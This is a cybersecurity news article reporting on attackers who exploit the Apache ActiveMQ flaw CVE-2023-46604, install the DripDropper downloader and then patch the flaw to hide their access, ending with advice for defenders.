Hackers Exploit and Then Patch ActiveMQ Flaw to Hide Malware Campaign

In a campaign that reads like a playbook for next-generation cybercrime, threat actors are exploiting a two-year-old Apache ActiveMQ flaw to compromise Linux cloud environments, deploy custom malware, and then patch the very hole they used to get in. The unusual tactic effectively locks out rival attackers and reduces the chance of discovery.

Researchers at Red Canary uncovered the activity, observing intrusions that start with exploitation of CVE-2023-46604, a critical remote code execution vulnerability in ActiveMQ rated at the maximum CVSS score of 10.0. Although Apache addressed the bug in October 2023, attackers continue to weaponize it in large numbers, with payloads ranging from ransomware to rootkits. In this case, the attackers added their own twist.

DripDropper: A Downloader That Hides in Plain Sight

Once inside, the intruders altered SSH configurations to allow root login and dropped a previously undocumented downloader called DripDropper. Packaged as a PyInstaller ELF binary, the tool resists analysis by requiring a password before execution. Communication is funneled through Dropbox, a tactic increasingly favored by attackers who want to blend malicious traffic with normal enterprise activity.

DripDropper serves up two additional components. One monitors processes, requests new instructions from Dropbox, and ensures persistence by modifying cron files across hourly, daily, weekly, and monthly jobs. The other reinforces access by tweaking SSH configurations and establishing a secondary Dropbox-based control channel.

Patching the Door Behind Them

The most striking step comes at the end. After entrenching themselves, the attackers download official Apache Maven patches for CVE-2023-46604 and apply them, closing the exploited vulnerability. Red Canary researchers noted that “patching the vulnerability does not disrupt their operations as they already established other persistence mechanisms for continued access.”

By fixing the bug, the attackers simultaneously prevent other criminals from piggybacking on the same flaw and obscure the original intrusion vector from defenders.

A Known but Rare Tradecraft

While rare, the method is not unprecedented. Last month, France’s national cybersecurity agency ANSSI reported a China-linked initial access broker using a similar strategy, patching exploited flaws to preserve exclusive control of compromised systems.

Expert Perspective

Ensar Seker, CISO at SOCRadar, called the campaign “a markedly elevated form of threat actor tradecraft.” He added, “Exploiting CVE-2023-46604 in ActiveMQ to gain entry is already alarming but what really makes this stand out is the attacker patching the vulnerability after establishing access. By fixing the very hole they exploited, they lock out other intruders and obscure the original attack vector, diminishing detection chances and confusing defenders.”

From there, attackers leverage Sliver implants, Cloudflare Tunnels, and SSH misconfigurations to maintain deep and resilient footholds. The approach highlights a growing sophistication in attacker operations where offense and defense blur.

Lessons for Defenders

For enterprises, the episode underscores a familiar but urgent warning: apply patches quickly, restrict internal service access to trusted IPs or VPNs, and monitor cloud logs for irregular behavior. Indicators such as unusual Dropbox connections, modified SSH settings, or cron job tampering should trigger immediate investigation.

The DripDropper campaign shows that adversaries are not only exploiting vulnerabilities but also racing to close them—on their terms.